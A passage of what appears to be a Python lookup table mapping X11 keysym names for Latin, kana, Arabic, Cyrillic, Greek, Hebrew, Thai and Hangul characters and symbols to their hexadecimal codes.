'Sacute': 0x01a6,
'Scaron': 0x01a9,
'Scedilla': 0x01aa,
'Tcaron': 0x01ab,
'Zacute': 0x01ac,
'Zcaron': 0x01ae,
'Zabovedot': 0x01af,
'aogonek': 0x01b1,
'ogonek': 0x01b2,
'lstroke': 0x01b3,
'lcaron': 0x01b5,
'sacute': 0x01b6,
'caron': 0x01b7,
'scaron': 0x01b9,
'scedilla': 0x01ba,
'tcaron': 0x01bb,
'zacute': 0x01bc,
'doubleacute': 0x01bd,
'zcaron': 0x01be,
'zabovedot': 0x01bf,
'Racute': 0x01c0,
'Abreve': 0x01c3,
'Lacute': 0x01c5,
'Cacute': 0x01c6,
'Ccaron': 0x01c8,
'Eogonek': 0x01ca,
'Ecaron': 0x01cc,
'Dcaron': 0x01cf,
'Dstroke': 0x01d0,
'Nacute': 0x01d1,
'Ncaron': 0x01d2,
'Odoubleacute': 0x01d5,
'Rcaron': 0x01d8,
'Uring': 0x01d9,
'Udoubleacute': 0x01db,
'Tcedilla': 0x01de,
'racute': 0x01e0,
'abreve': 0x01e3,
'lacute': 0x01e5,
'cacute': 0x01e6,
'ccaron': 0x01e8,
'eogonek': 0x01ea,
'ecaron': 0x01ec,
'dcaron': 0x01ef,
'dstroke': 0x01f0,
'nacute': 0x01f1,
'ncaron': 0x01f2,
'odoubleacute': 0x01f5,
'udoubleacute': 0x01fb,
'rcaron': 0x01f8,
'uring': 0x01f9,
'tcedilla': 0x01fe,
'abovedot': 0x01ff,
'Hstroke': 0x02a1,
'Hcircumflex': 0x02a6,
'Iabovedot': 0x02a9,
'Gbreve': 0x02ab,
'Jcircumflex': 0x02ac,
'hstroke': 0x02b1,
'hcircumflex': 0x02b6,
'idotless': 0x02b9,
'gbreve': 0x02bb,
'jcircumflex': 0x02bc,
'Cabovedot': 0x02c5,
'Ccircumflex': 0x02c6,
'Gabovedot': 0x02d5,
'Gcircumflex': 0x02d8,
'Ubreve': 0x02dd,
'Scircumflex': 0x02de,
'cabovedot': 0x02e5,
'ccircumflex': 0x02e6,
'gabovedot': 0x02f5,
'gcircumflex': 0x02f8,
'ubreve': 0x02fd,
'scircumflex': 0x02fe,
'kra': 0x03a2,
'kappa': 0x03a2,
'Rcedilla': 0x03a3,
'Itilde': 0x03a5,
'Lcedilla': 0x03a6,
'Emacron': 0x03aa,
'Gcedilla': 0x03ab,
'Tslash': 0x03ac,
'rcedilla': 0x03b3,
'itilde': 0x03b5,
'lcedilla': 0x03b6,
'emacron': 0x03ba,
'gcedilla': 0x03bb,
'tslash': 0x03bc,
'ENG': 0x03bd,
'eng': 0x03bf,
'Amacron': 0x03c0,
'Iogonek': 0x03c7,
'Eabovedot': 0x03cc,
'Imacron': 0x03cf,
'Ncedilla': 0x03d1,
'Omacron': 0x03d2,
'Kcedilla': 0x03d3,
'Uogonek': 0x03d9,
'Utilde': 0x03dd,
'Umacron': 0x03de,
'amacron': 0x03e0,
'iogonek': 0x03e7,
'eabovedot': 0x03ec,
'imacron': 0x03ef,
'ncedilla': 0x03f1,
'omacron': 0x03f2,
'kcedilla': 0x03f3,
'uogonek': 0x03f9,
'utilde': 0x03fd,
'umacron': 0x03fe,
'Babovedot': 0x1001e02,
'babovedot': 0x1001e03,
'Dabovedot': 0x1001e0a,
'Wgrave': 0x1001e80,
'Wacute': 0x1001e82,
'dabovedot': 0x1001e0b,
'Ygrave': 0x1001ef2,
'Fabovedot': 0x1001e1e,
'fabovedot': 0x1001e1f,
'Mabovedot': 0x1001e40,
'mabovedot': 0x1001e41,
'Pabovedot': 0x1001e56,
'wgrave': 0x1001e81,
'pabovedot': 0x1001e57,
'wacute': 0x1001e83,
'Sabovedot': 0x1001e60,
'ygrave': 0x1001ef3,
'Wdiaeresis': 0x1001e84,
'wdiaeresis': 0x1001e85,
'sabovedot': 0x1001e61,
'Wcircumflex': 0x1000174,
'Tabovedot': 0x1001e6a,
'Ycircumflex': 0x1000176,
'wcircumflex': 0x1000175,
'tabovedot': 0x1001e6b,
'ycircumflex': 0x1000177,
'OE': 0x13bc,
'oe': 0x13bd,
'Ydiaeresis': 0x13be,
'overline': 0x047e,
'kana_fullstop': 0x04a1,
'kana_openingbracket': 0x04a2,
'kana_closingbracket': 0x04a3,
'kana_comma': 0x04a4,
'kana_conjunctive': 0x04a5,
'kana_middledot': 0x04a5,
'kana_WO': 0x04a6,
'kana_a': 0x04a7,
'kana_i': 0x04a8,
'kana_u': 0x04a9,
'kana_e': 0x04aa,
'kana_o': 0x04ab,
'kana_ya': 0x04ac,
'kana_yu': 0x04ad,
'kana_yo': 0x04ae,
'kana_tsu': 0x04af,
'kana_tu': 0x04af,
'prolongedsound': 0x04b0,
'kana_A': 0x04b1,
'kana_I': 0x04b2,
'kana_U': 0x04b3,
'kana_E': 0x04b4,
'kana_O': 0x04b5,
'kana_KA': 0x04b6,
'kana_KI': 0x04b7,
'kana_KU': 0x04b8,
'kana_KE': 0x04b9,
'kana_KO': 0x04ba,
'kana_SA': 0x04bb,
'kana_SHI': 0x04bc,
'kana_SU': 0x04bd,
'kana_SE': 0x04be,
'kana_SO': 0x04bf,
'kana_TA': 0x04c0,
'kana_CHI': 0x04c1,
'kana_TI': 0x04c1,
'kana_TSU': 0x04c2,
'kana_TU': 0x04c2,
'kana_TE': 0x04c3,
'kana_TO': 0x04c4,
'kana_NA': 0x04c5,
'kana_NI': 0x04c6,
'kana_NU': 0x04c7,
'kana_NE': 0x04c8,
'kana_NO': 0x04c9,
'kana_HA': 0x04ca,
'kana_HI': 0x04cb,
'kana_FU': 0x04cc,
'kana_HU': 0x04cc,
'kana_HE': 0x04cd,
'kana_HO': 0x04ce,
'kana_MA': 0x04cf,
'kana_MI': 0x04d0,
'kana_MU': 0x04d1,
'kana_ME': 0x04d2,
'kana_MO': 0x04d3,
'kana_YA': 0x04d4,
'kana_YU': 0x04d5,
'kana_YO': 0x04d6,
'kana_RA': 0x04d7,
'kana_RI': 0x04d8,
'kana_RU': 0x04d9,
'kana_RE': 0x04da,
'kana_RO': 0x04db,
'kana_WA': 0x04dc,
'kana_N': 0x04dd,
'voicedsound': 0x04de,
'semivoicedsound': 0x04df,
'kana_switch': 0xff7e,
'Farsi_0': 0x10006f0,
'Farsi_1': 0x10006f1,
'Farsi_2': 0x10006f2,
'Farsi_3': 0x10006f3,
'Farsi_4': 0x10006f4,
'Farsi_5': 0x10006f5,
'Farsi_6': 0x10006f6,
'Farsi_7': 0x10006f7,
'Farsi_8': 0x10006f8,
'Farsi_9': 0x10006f9,
'Arabic_percent': 0x100066a,
'Arabic_superscript_alef': 0x1000670,
'Arabic_tteh': 0x1000679,
'Arabic_peh': 0x100067e,
'Arabic_tcheh': 0x1000686,
'Arabic_ddal': 0x1000688,
'Arabic_rreh': 0x1000691,
'Arabic_comma': 0x05ac,
'Arabic_fullstop': 0x10006d4,
'Arabic_0': 0x1000660,
'Arabic_1': 0x1000661,
'Arabic_2': 0x1000662,
'Arabic_3': 0x1000663,
'Arabic_4': 0x1000664,
'Arabic_5': 0x1000665,
'Arabic_6': 0x1000666,
'Arabic_7': 0x1000667,
'Arabic_8': 0x1000668,
'Arabic_9': 0x1000669,
'Arabic_semicolon': 0x05bb,
'Arabic_question_mark': 0x05bf,
'Arabic_hamza': 0x05c1,
'Arabic_maddaonalef': 0x05c2,
'Arabic_hamzaonalef': 0x05c3,
'Arabic_hamzaonwaw': 0x05c4,
'Arabic_hamzaunderalef': 0x05c5,
'Arabic_hamzaonyeh': 0x05c6,
'Arabic_alef': 0x05c7,
'Arabic_beh': 0x05c8,
'Arabic_tehmarbuta': 0x05c9,
'Arabic_teh': 0x05ca,
'Arabic_theh': 0x05cb,
'Arabic_jeem': 0x05cc,
'Arabic_hah': 0x05cd,
'Arabic_khah': 0x05ce,
'Arabic_dal': 0x05cf,
'Arabic_thal': 0x05d0,
'Arabic_ra': 0x05d1,
'Arabic_zain': 0x05d2,
'Arabic_seen': 0x05d3,
'Arabic_sheen': 0x05d4,
'Arabic_sad': 0x05d5,
'Arabic_dad': 0x05d6,
'Arabic_tah': 0x05d7,
'Arabic_zah': 0x05d8,
'Arabic_ain': 0x05d9,
'Arabic_ghain': 0x05da,
'Arabic_tatweel': 0x05e0,
'Arabic_feh': 0x05e1,
'Arabic_qaf': 0x05e2,
'Arabic_kaf': 0x05e3,
'Arabic_lam': 0x05e4,
'Arabic_meem': 0x05e5,
'Arabic_noon': 0x05e6,
'Arabic_ha': 0x05e7,
'Arabic_heh': 0x05e7,
'Arabic_waw': 0x05e8,
'Arabic_alefmaksura': 0x05e9,
'Arabic_yeh': 0x05ea,
'Arabic_fathatan': 0x05eb,
'Arabic_dammatan': 0x05ec,
'Arabic_kasratan': 0x05ed,
'Arabic_fatha': 0x05ee,
'Arabic_damma': 0x05ef,
'Arabic_kasra': 0x05f0,
'Arabic_shadda': 0x05f1,
'Arabic_sukun': 0x05f2,
'Arabic_madda_above': 0x1000653,
'Arabic_hamza_above': 0x1000654,
'Arabic_hamza_below': 0x1000655,
'Arabic_jeh': 0x1000698,
'Arabic_veh': 0x10006a4,
'Arabic_keheh': 0x10006a9,
'Arabic_gaf': 0x10006af,
'Arabic_noon_ghunna': 0x10006ba,
'Arabic_heh_doachashmee': 0x10006be,
'Farsi_yeh': 0x10006cc,
'Arabic_farsi_yeh': 0x10006cc,
'Arabic_yeh_baree': 0x10006d2,
'Arabic_heh_goal': 0x10006c1,
'Arabic_switch': 0xff7e,
'Cyrillic_GHE_bar': 0x1000492,
'Cyrillic_ghe_bar': 0x1000493,
'Cyrillic_ZHE_descender': 0x1000496,
'Cyrillic_zhe_descender': 0x1000497,
'Cyrillic_KA_descender': 0x100049a,
'Cyrillic_ka_descender': 0x100049b,
'Cyrillic_KA_vertstroke': 0x100049c,
'Cyrillic_ka_vertstroke': 0x100049d,
'Cyrillic_EN_descender': 0x10004a2,
'Cyrillic_en_descender': 0x10004a3,
'Cyrillic_U_straight': 0x10004ae,
'Cyrillic_u_straight': 0x10004af,
'Cyrillic_U_straight_bar': 0x10004b0,
'Cyrillic_u_straight_bar': 0x10004b1,
'Cyrillic_HA_descender': 0x10004b2,
'Cyrillic_ha_descender': 0x10004b3,
'Cyrillic_CHE_descender': 0x10004b6,
'Cyrillic_che_descender': 0x10004b7,
'Cyrillic_CHE_vertstroke': 0x10004b8,
'Cyrillic_che_vertstroke': 0x10004b9,
'Cyrillic_SHHA': 0x10004ba,
'Cyrillic_shha': 0x10004bb,
'Cyrillic_SCHWA': 0x10004d8,
'Cyrillic_schwa': 0x10004d9,
'Cyrillic_I_macron': 0x10004e2,
'Cyrillic_i_macron': 0x10004e3,
'Cyrillic_O_bar': 0x10004e8,
'Cyrillic_o_bar': 0x10004e9,
'Cyrillic_U_macron': 0x10004ee,
'Cyrillic_u_macron': 0x10004ef,
'Serbian_dje': 0x06a1,
'Macedonia_gje': 0x06a2,
'Cyrillic_io': 0x06a3,
'Ukrainian_ie': 0x06a4,
'Ukranian_je': 0x06a4,
'Macedonia_dse': 0x06a5,
'Ukrainian_i': 0x06a6,
'Ukranian_i': 0x06a6,
'Ukrainian_yi': 0x06a7,
'Ukranian_yi': 0x06a7,
'Cyrillic_je': 0x06a8,
'Serbian_je': 0x06a8,
'Cyrillic_lje': 0x06a9,
'Serbian_lje': 0x06a9,
'Cyrillic_nje': 0x06aa,
'Serbian_nje': 0x06aa,
'Serbian_tshe': 0x06ab,
'Macedonia_kje': 0x06ac,
'Ukrainian_ghe_with_upturn': 0x06ad,
'Byelorussian_shortu': 0x06ae,
'Cyrillic_dzhe': 0x06af,
'Serbian_dze': 0x06af,
'numerosign': 0x06b0,
'Serbian_DJE': 0x06b1,
'Macedonia_GJE': 0x06b2,
'Cyrillic_IO': 0x06b3,
'Ukrainian_IE': 0x06b4,
'Ukranian_JE': 0x06b4,
'Macedonia_DSE': 0x06b5,
'Ukrainian_I': 0x06b6,
'Ukranian_I': 0x06b6,
'Ukrainian_YI': 0x06b7,
'Ukranian_YI': 0x06b7,
'Cyrillic_JE': 0x06b8,
'Serbian_JE': 0x06b8,
'Cyrillic_LJE': 0x06b9,
'Serbian_LJE': 0x06b9,
'Cyrillic_NJE': 0x06ba,
'Serbian_NJE': 0x06ba,
'Serbian_TSHE': 0x06bb,
'Macedonia_KJE': 0x06bc,
'Ukrainian_GHE_WITH_UPTURN': 0x06bd,
'Byelorussian_SHORTU': 0x06be,
'Cyrillic_DZHE': 0x06bf,
'Serbian_DZE': 0x06bf,
'Cyrillic_yu': 0x06c0,
'Cyrillic_a': 0x06c1,
'Cyrillic_be': 0x06c2,
'Cyrillic_tse': 0x06c3,
'Cyrillic_de': 0x06c4,
'Cyrillic_ie': 0x06c5,
'Cyrillic_ef': 0x06c6,
'Cyrillic_ghe': 0x06c7,
'Cyrillic_ha': 0x06c8,
'Cyrillic_i': 0x06c9,
'Cyrillic_shorti': 0x06ca,
'Cyrillic_ka': 0x06cb,
'Cyrillic_el': 0x06cc,
'Cyrillic_em': 0x06cd,
'Cyrillic_en': 0x06ce,
'Cyrillic_o': 0x06cf,
'Cyrillic_pe': 0x06d0,
'Cyrillic_ya': 0x06d1,
'Cyrillic_er': 0x06d2,
'Cyrillic_es': 0x06d3,
'Cyrillic_te': 0x06d4,
'Cyrillic_u': 0x06d5,
'Cyrillic_zhe': 0x06d6,
'Cyrillic_ve': 0x06d7,
'Cyrillic_softsign': 0x06d8,
'Cyrillic_yeru': 0x06d9,
'Cyrillic_ze': 0x06da,
'Cyrillic_sha': 0x06db,
'Cyrillic_e': 0x06dc,
'Cyrillic_shcha': 0x06dd,
'Cyrillic_che': 0x06de,
'Cyrillic_hardsign': 0x06df,
'Cyrillic_YU': 0x06e0,
'Cyrillic_A': 0x06e1,
'Cyrillic_BE': 0x06e2,
'Cyrillic_TSE': 0x06e3,
'Cyrillic_DE': 0x06e4,
'Cyrillic_IE': 0x06e5,
'Cyrillic_EF': 0x06e6,
'Cyrillic_GHE': 0x06e7,
'Cyrillic_HA': 0x06e8,
'Cyrillic_I': 0x06e9,
'Cyrillic_SHORTI': 0x06ea,
'Cyrillic_KA': 0x06eb,
'Cyrillic_EL': 0x06ec,
'Cyrillic_EM': 0x06ed,
'Cyrillic_EN': 0x06ee,
'Cyrillic_O': 0x06ef,
'Cyrillic_PE': 0x06f0,
'Cyrillic_YA': 0x06f1,
'Cyrillic_ER': 0x06f2,
'Cyrillic_ES': 0x06f3,
'Cyrillic_TE': 0x06f4,
'Cyrillic_U': 0x06f5,
'Cyrillic_ZHE': 0x06f6,
'Cyrillic_VE': 0x06f7,
'Cyrillic_SOFTSIGN': 0x06f8,
'Cyrillic_YERU': 0x06f9,
'Cyrillic_ZE': 0x06fa,
'Cyrillic_SHA': 0x06fb,
'Cyrillic_E': 0x06fc,
'Cyrillic_SHCHA': 0x06fd,
'Cyrillic_CHE': 0x06fe,
'Cyrillic_HARDSIGN': 0x06ff,
'Greek_ALPHAaccent': 0x07a1,
'Greek_EPSILONaccent': 0x07a2,
'Greek_ETAaccent': 0x07a3,
'Greek_IOTAaccent': 0x07a4,
'Greek_IOTAdieresis': 0x07a5,
'Greek_IOTAdiaeresis': 0x07a5,
'Greek_OMICRONaccent': 0x07a7,
'Greek_UPSILONaccent': 0x07a8,
'Greek_UPSILONdieresis': 0x07a9,
'Greek_OMEGAaccent': 0x07ab,
'Greek_accentdieresis': 0x07ae,
'Greek_horizbar': 0x07af,
'Greek_alphaaccent': 0x07b1,
'Greek_epsilonaccent': 0x07b2,
'Greek_etaaccent': 0x07b3,
'Greek_iotaaccent': 0x07b4,
'Greek_iotadieresis': 0x07b5,
'Greek_iotaaccentdieresis': 0x07b6,
'Greek_omicronaccent': 0x07b7,
'Greek_upsilonaccent': 0x07b8,
'Greek_upsilondieresis': 0x07b9,
'Greek_upsilonaccentdieresis': 0x07ba,
'Greek_omegaaccent': 0x07bb,
'Greek_ALPHA': 0x07c1,
'Greek_BETA': 0x07c2,
'Greek_GAMMA': 0x07c3,
'Greek_DELTA': 0x07c4,
'Greek_EPSILON': 0x07c5,
'Greek_ZETA': 0x07c6,
'Greek_ETA': 0x07c7,
'Greek_THETA': 0x07c8,
'Greek_IOTA': 0x07c9,
'Greek_KAPPA': 0x07ca,
'Greek_LAMDA': 0x07cb,
'Greek_LAMBDA': 0x07cb,
'Greek_MU': 0x07cc,
'Greek_NU': 0x07cd,
'Greek_XI': 0x07ce,
'Greek_OMICRON': 0x07cf,
'Greek_PI': 0x07d0,
'Greek_RHO': 0x07d1,
'Greek_SIGMA': 0x07d2,
'Greek_TAU': 0x07d4,
'Greek_UPSILON': 0x07d5,
'Greek_PHI': 0x07d6,
'Greek_CHI': 0x07d7,
'Greek_PSI': 0x07d8,
'Greek_OMEGA': 0x07d9,
'Greek_alpha': 0x07e1,
'Greek_beta': 0x07e2,
'Greek_gamma': 0x07e3,
'Greek_delta': 0x07e4,
'Greek_epsilon': 0x07e5,
'Greek_zeta': 0x07e6,
'Greek_eta': 0x07e7,
'Greek_theta': 0x07e8,
'Greek_iota': 0x07e9,
'Greek_kappa': 0x07ea,
'Greek_lamda': 0x07eb,
'Greek_lambda': 0x07eb,
'Greek_mu': 0x07ec,
'Greek_nu': 0x07ed,
'Greek_xi': 0x07ee,
'Greek_omicron': 0x07ef,
'Greek_pi': 0x07f0,
'Greek_rho': 0x07f1,
'Greek_sigma': 0x07f2,
'Greek_finalsmallsigma': 0x07f3,
'Greek_tau': 0x07f4,
'Greek_upsilon': 0x07f5,
'Greek_phi': 0x07f6,
'Greek_chi': 0x07f7,
'Greek_psi': 0x07f8,
'Greek_omega': 0x07f9,
'Greek_switch': 0xff7e,
'leftradical': 0x08a1,
'topleftradical': 0x08a2,
'horizconnector': 0x08a3,
'topintegral': 0x08a4,
'botintegral': 0x08a5,
'vertconnector': 0x08a6,
'topleftsqbracket': 0x08a7,
'botleftsqbracket': 0x08a8,
'toprightsqbracket': 0x08a9,
'botrightsqbracket': 0x08aa,
'topleftparens': 0x08ab,
'botleftparens': 0x08ac,
'toprightparens': 0x08ad,
'botrightparens': 0x08ae,
'leftmiddlecurlybrace': 0x08af,
'rightmiddlecurlybrace': 0x08b0,
'topleftsummation': 0x08b1,
'botleftsummation': 0x08b2,
'topvertsummationconnector': 0x08b3,
'botvertsummationconnector': 0x08b4,
'toprightsummation': 0x08b5,
'botrightsummation': 0x08b6,
'rightmiddlesummation': 0x08b7,
'lessthanequal': 0x08bc,
'notequal': 0x08bd,
'greaterthanequal': 0x08be,
'integral': 0x08bf,
'therefore': 0x08c0,
'variation': 0x08c1,
'infinity': 0x08c2,
'nabla': 0x08c5,
'approximate': 0x08c8,
'similarequal': 0x08c9,
'ifonlyif': 0x08cd,
'implies': 0x08ce,
'identical': 0x08cf,
'radical': 0x08d6,
'includedin': 0x08da,
'includes': 0x08db,
'intersection': 0x08dc,
'union': 0x08dd,
'logicaland': 0x08de,
'logicalor': 0x08df,
'partialderivative': 0x08ef,
'function': 0x08f6,
'leftarrow': 0x08fb,
'uparrow': 0x08fc,
'rightarrow': 0x08fd,
'downarrow': 0x08fe,
'blank': 0x09df,
'soliddiamond': 0x09e0,
'checkerboard': 0x09e1,
'ht': 0x09e2,
'ff': 0x09e3,
'cr': 0x09e4,
'lf': 0x09e5,
'nl': 0x09e8,
'vt': 0x09e9,
'lowrightcorner': 0x09ea,
'uprightcorner': 0x09eb,
'upleftcorner': 0x09ec,
'lowleftcorner': 0x09ed,
'crossinglines': 0x09ee,
'horizlinescan1': 0x09ef,
'horizlinescan3': 0x09f0,
'horizlinescan5': 0x09f1,
'horizlinescan7': 0x09f2,
'horizlinescan9': 0x09f3,
'leftt': 0x09f4,
'rightt': 0x09f5,
'bott': 0x09f6,
'topt': 0x09f7,
'vertbar': 0x09f8,
'emspace': 0x0aa1,
'enspace': 0x0aa2,
'em3space': 0x0aa3,
'em4space': 0x0aa4,
'digitspace': 0x0aa5,
'punctspace': 0x0aa6,
'thinspace': 0x0aa7,
'hairspace': 0x0aa8,
'emdash': 0x0aa9,
'endash': 0x0aaa,
'signifblank': 0x0aac,
'ellipsis': 0x0aae,
'doubbaselinedot': 0x0aaf,
'onethird': 0x0ab0,
'twothirds': 0x0ab1,
'onefifth': 0x0ab2,
'twofifths': 0x0ab3,
'threefifths': 0x0ab4,
'fourfifths': 0x0ab5,
'onesixth': 0x0ab6,
'fivesixths': 0x0ab7,
'careof': 0x0ab8,
'figdash': 0x0abb,
'leftanglebracket': 0x0abc,
'decimalpoint': 0x0abd,
'rightanglebracket': 0x0abe,
'marker': 0x0abf,
'oneeighth': 0x0ac3,
'threeeighths': 0x0ac4,
'fiveeighths': 0x0ac5,
'seveneighths': 0x0ac6,
'trademark': 0x0ac9,
'signaturemark': 0x0aca,
'trademarkincircle': 0x0acb,
'leftopentriangle': 0x0acc,
'rightopentriangle': 0x0acd,
'emopencircle': 0x0ace,
'emopenrectangle': 0x0acf,
'leftsinglequotemark': 0x0ad0,
'rightsinglequotemark': 0x0ad1,
'leftdoublequotemark': 0x0ad2,
'rightdoublequotemark': 0x0ad3,
'prescription': 0x0ad4,
'minutes': 0x0ad6,
'seconds': 0x0ad7,
'latincross': 0x0ad9,
'hexagram': 0x0ada,
'filledrectbullet': 0x0adb,
'filledlefttribullet': 0x0adc,
'filledrighttribullet': 0x0add,
'emfilledcircle': 0x0ade,
'emfilledrect': 0x0adf,
'enopencircbullet': 0x0ae0,
'enopensquarebullet': 0x0ae1,
'openrectbullet': 0x0ae2,
'opentribulletup': 0x0ae3,
'opentribulletdown': 0x0ae4,
'openstar': 0x0ae5,
'enfilledcircbullet': 0x0ae6,
'enfilledsqbullet': 0x0ae7,
'filledtribulletup': 0x0ae8,
'filledtribulletdown': 0x0ae9,
'leftpointer': 0x0aea,
'rightpointer': 0x0aeb,
'club': 0x0aec,
'diamond': 0x0aed,
'heart': 0x0aee,
'maltesecross': 0x0af0,
'dagger': 0x0af1,
'doubledagger': 0x0af2,
'checkmark': 0x0af3,
'ballotcross': 0x0af4,
'musicalsharp': 0x0af5,
'musicalflat': 0x0af6,
'malesymbol': 0x0af7,
'femalesymbol': 0x0af8,
'telephone': 0x0af9,
'telephonerecorder': 0x0afa,
'phonographcopyright': 0x0afb,
'caret': 0x0afc,
'singlelowquotemark': 0x0afd,
'doublelowquotemark': 0x0afe,
'cursor': 0x0aff,
'leftcaret': 0x0ba3,
'rightcaret': 0x0ba6,
'downcaret': 0x0ba8,
'upcaret': 0x0ba9,
'overbar': 0x0bc0,
'downtack': 0x0bc2,
'upshoe': 0x0bc3,
'downstile': 0x0bc4,
'underbar': 0x0bc6,
'jot': 0x0bca,
'quad': 0x0bcc,
'uptack': 0x0bce,
'circle': 0x0bcf,
'upstile': 0x0bd3,
'downshoe': 0x0bd6,
'rightshoe': 0x0bd8,
'leftshoe': 0x0bda,
'lefttack': 0x0bdc,
'righttack': 0x0bfc,
'hebrew_doublelowline': 0x0cdf,
'hebrew_aleph': 0x0ce0,
'hebrew_bet': 0x0ce1,
'hebrew_beth': 0x0ce1,
'hebrew_gimel': 0x0ce2,
'hebrew_gimmel': 0x0ce2,
'hebrew_dalet': 0x0ce3,
'hebrew_daleth': 0x0ce3,
'hebrew_he': 0x0ce4,
'hebrew_waw': 0x0ce5,
'hebrew_zain': 0x0ce6,
'hebrew_zayin': 0x0ce6,
'hebrew_chet': 0x0ce7,
'hebrew_het': 0x0ce7,
'hebrew_tet': 0x0ce8,
'hebrew_teth': 0x0ce8,
'hebrew_yod': 0x0ce9,
'hebrew_finalkaph': 0x0cea,
'hebrew_kaph': 0x0ceb,
'hebrew_lamed': 0x0cec,
'hebrew_finalmem': 0x0ced,
'hebrew_mem': 0x0cee,
'hebrew_finalnun': 0x0cef,
'hebrew_nun': 0x0cf0,
'hebrew_samech': 0x0cf1,
'hebrew_samekh': 0x0cf1,
'hebrew_ayin': 0x0cf2,
'hebrew_finalpe': 0x0cf3,
'hebrew_pe': 0x0cf4,
'hebrew_finalzade': 0x0cf5,
'hebrew_finalzadi': 0x0cf5,
'hebrew_zade': 0x0cf6,
'hebrew_zadi': 0x0cf6,
'hebrew_qoph': 0x0cf7,
'hebrew_kuf': 0x0cf7,
'hebrew_resh': 0x0cf8,
'hebrew_shin': 0x0cf9,
'hebrew_taw': 0x0cfa,
'hebrew_taf': 0x0cfa,
'Hebrew_switch': 0xff7e,
'Thai_kokai': 0x0da1,
'Thai_khokhai': 0x0da2,
'Thai_khokhuat': 0x0da3,
'Thai_khokhwai': 0x0da4,
'Thai_khokhon': 0x0da5,
'Thai_khorakhang': 0x0da6,
'Thai_ngongu': 0x0da7,
'Thai_chochan': 0x0da8,
'Thai_choching': 0x0da9,
'Thai_chochang': 0x0daa,
'Thai_soso': 0x0dab,
'Thai_chochoe': 0x0dac,
'Thai_yoying': 0x0dad,
'Thai_dochada': 0x0dae,
'Thai_topatak': 0x0daf,
'Thai_thothan': 0x0db0,
'Thai_thonangmontho': 0x0db1,
'Thai_thophuthao': 0x0db2,
'Thai_nonen': 0x0db3,
'Thai_dodek': 0x0db4,
'Thai_totao': 0x0db5,
'Thai_thothung': 0x0db6,
'Thai_thothahan': 0x0db7,
'Thai_thothong': 0x0db8,
'Thai_nonu': 0x0db9,
'Thai_bobaimai': 0x0dba,
'Thai_popla': 0x0dbb,
'Thai_phophung': 0x0dbc,
'Thai_fofa': 0x0dbd,
'Thai_phophan': 0x0dbe,
'Thai_fofan': 0x0dbf,
'Thai_phosamphao': 0x0dc0,
'Thai_moma': 0x0dc1,
'Thai_yoyak': 0x0dc2,
'Thai_rorua': 0x0dc3,
'Thai_ru': 0x0dc4,
'Thai_loling': 0x0dc5,
'Thai_lu': 0x0dc6,
'Thai_wowaen': 0x0dc7,
'Thai_sosala': 0x0dc8,
'Thai_sorusi': 0x0dc9,
'Thai_sosua': 0x0dca,
'Thai_hohip': 0x0dcb,
'Thai_lochula': 0x0dcc,
'Thai_oang': 0x0dcd,
'Thai_honokhuk': 0x0dce,
'Thai_paiyannoi': 0x0dcf,
'Thai_saraa': 0x0dd0,
'Thai_maihanakat': 0x0dd1,
'Thai_saraaa': 0x0dd2,
'Thai_saraam': 0x0dd3,
'Thai_sarai': 0x0dd4,
'Thai_saraii': 0x0dd5,
'Thai_saraue': 0x0dd6,
'Thai_sarauee': 0x0dd7,
'Thai_sarau': 0x0dd8,
'Thai_sarauu': 0x0dd9,
'Thai_phinthu': 0x0dda,
'Thai_maihanakat_maitho': 0x0dde,
'Thai_baht': 0x0ddf,
'Thai_sarae': 0x0de0,
'Thai_saraae': 0x0de1,
'Thai_sarao': 0x0de2,
'Thai_saraaimaimuan': 0x0de3,
'Thai_saraaimaimalai': 0x0de4,
'Thai_lakkhangyao': 0x0de5,
'Thai_maiyamok': 0x0de6,
'Thai_maitaikhu': 0x0de7,
'Thai_maiek': 0x0de8,
'Thai_maitho': 0x0de9,
'Thai_maitri': 0x0dea,
'Thai_maichattawa': 0x0deb,
'Thai_thanthakhat': 0x0dec,
'Thai_nikhahit': 0x0ded,
'Thai_leksun': 0x0df0,
'Thai_leknung': 0x0df1,
'Thai_leksong': 0x0df2,
'Thai_leksam': 0x0df3,
'Thai_leksi': 0x0df4,
'Thai_lekha': 0x0df5,
'Thai_lekhok': 0x0df6,
'Thai_lekchet': 0x0df7,
'Thai_lekpaet': 0x0df8,
'Thai_lekkao': 0x0df9,
'Hangul': 0xff31,
'Hangul_Start': 0xff32,
'Hangul_End': 0xff33,
'Hangul_Hanja': 0xff34,
'Hangul_Jamo': 0xff35,
'Hangul_Romaja': 0xff36,
'Hangul_Codeinput': 0xff37,
'Hangul_Jeonja': 0xff38,
'Hangul_Banja': 0xff39,
'Hangul_PreHanja': 0xff3a,
'Hangul_PostHanja': 0xff3b,
'Hangul_SingleCandidate': 0xff3c,
'Hangul_MultipleCandidate': 0xff3d,
'Hangul_PreviousCandidate': 0xff3e,
'Hangul_Special': 0xff3f,
'Hangul_switch': 0xff7e,
'Hangul_Kiyeog': 0x0ea1,
'Hangul_SsangKiyeog': 0x0ea2,
'Hangul_KiyeogSios': 0x0ea3,
'Hangul_Nieun': 0x0ea4,
'Hangul_NieunJieuj': 0x0ea5,
'Hangul_NieunHieuh': 0x0ea6,
'Hangul_Dikeud': 0x0ea7,
'Hangul_SsangDikeud': 0x0ea8,
'Hangul_Rieul': 0x0ea9,
'Hangul_RieulKiyeog': 0x0eaa,
'Hangul_RieulMieum': 0x0eab,
'Hangul_RieulPieub': 0x0eac,
'Hangul_RieulSios': 0x0ead,
'Hangul_RieulTieut': 0x0eae,
'Hangul_RieulPhieuf': 0x0eaf,
'Hangul_RieulHieuh': 0x0eb0,
'Hangul_Mieum': 0x0eb1,
'Hangul_Pieub': 0x0eb2,
'Hangul_SsangPieub': 0x0eb3,
'Hangul_PieubSios': 0x0eb4,
'Hangul_Sios': 0x0eb5,
'Hangul_SsangSios': 0x0eb6,
'Hangul_Ieung': 0x0eb7,
'Hangul_Jieuj': 0x0eb8,
'Hangul_SsangJieuj': 0x0eb9,
'Hangul_Cieuc': 0x0eba,
'Hangul_Khieuq': 0x0ebb,
'Hangul_Tieut': 0x0ebc,
'Hangul_Phieuf': 0x0ebd,
'Hangul_Hieuh': 0x0ebe,
'Hangul_A': 0x0ebf,
'Hangul_AE': 0x0ec0,
'Hangul_YA': 0x0ec1,
'Hangul_YAE': 0x0ec2,
'Hangul_EO': 0x0ec3,
'Hangul_E': 0x0ec4,
'Hangul_YEO': 0x0ec5,
'Hangul_YE': 0x0ec6,
'Hangul_O': 0x0ec7,
'Hangul_WA': 0x0ec8,
'Hangul_WAE': 0x0ec9,
'Hangul_OE': 0x0eca,
'Hangul_YO': 0x0ecb,
'Hangul_U': 0x0ecc,
